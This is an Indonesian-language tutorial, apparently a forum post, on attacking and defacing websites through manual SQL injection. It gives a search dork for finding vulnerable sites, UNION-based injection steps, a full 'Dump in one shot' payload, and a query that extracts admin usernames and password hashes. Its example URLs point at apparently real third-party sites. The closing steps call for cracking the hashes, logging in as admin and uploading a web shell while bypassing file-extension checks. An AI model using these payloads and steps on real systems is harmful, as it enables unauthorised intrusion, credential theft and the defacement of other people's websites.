[SQLi] deface poc SQLi with DIOS (Dump in one shot)

 

Hello world

lama kaga aplod :v

liat title kawand

kali ini gw kasih tau cara SQLi manual / Sqli with DIOS

langsung gas ke tutorial nya...

Bahan² :

1.Browser

2.dork jitu adalan gw : 

inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"

3.internet

4.Kesabaran tentunya

Step by step :

1. Dorking dulu ngab... cari target nya... trs pastikan ada tulisan "You have an error in your SQL syntax" di dalem website ny kalo g ada tambahin parameter tanda ' atau %27 dibelakang angka

2. nah kl bener² udah ada text "You have an error in your SQL syntax" langsung kita order by 

tambahkan parameter dibelakang %27 

+order+by+1--+-

tambahin angkanya sampe error

nah disini target gw pas angka 8 error nya

maka sudah dipastikan tabel nya ada 7

3.maka lanjut kita union select dan kasih tanda (-) *tanpa tanda kurung

didepan tulisan "id=" sebelum angka

tambahkan parameter ini (angka sesuai tabel)

+union+select+[jumlah,Tabel]--+-

contoh :

http://site.co.il/index.php?id=-12+union+select+1,2,3,4,5,6,7--+-

karena tabel ny ada 7

ok lanjut...

maka akan muncul kode AJAIB...

dan disini target gw angka ajaib nya adalah 2

maka pastekan kode inject DIOS ini tepat di bagian angka itu

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

contoh :

http://kansascitynova.org/news.php?id=-42%27+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7--+-

karena angka ajaib nya adalah 2

jadi angka 2 nya di ganti kode inject

4.Maka akan muncul beberapa tabel

saatnya membuka tabel yg berhubungan dgn admin untuk mengetahui user dan pw admin

masukkan kode inject untuk membuka tabel ini

/*!50000(SELECT+GROUP_CONCAT([user_id],0x3a,[user_pw]+SEPARATOR+0x3c62723e)+FROM+[securityTab])*/

 

Yang gw Tandai [ ] Yang Harus Kalian Ganti sesuai dengan tabel

5.Maka terbukalah tabel admin nya dan terlihat user+pw nya

disini pw nya masih berbentuk md5 jadi harus di encode dengan md5 hash killer (*kalian bisa search di google banyak)

6.jika dah di encode lalu kalian cari admin login nya dan kalian upload shell kalian

kl g bisa ya bypass ext nya

 note : kalo ngindex ya backup dulu ya kak 😔 karena membuat tak semudah menghancurkan... 

[selesai]

don't forget to share to your friends^^

#happy learn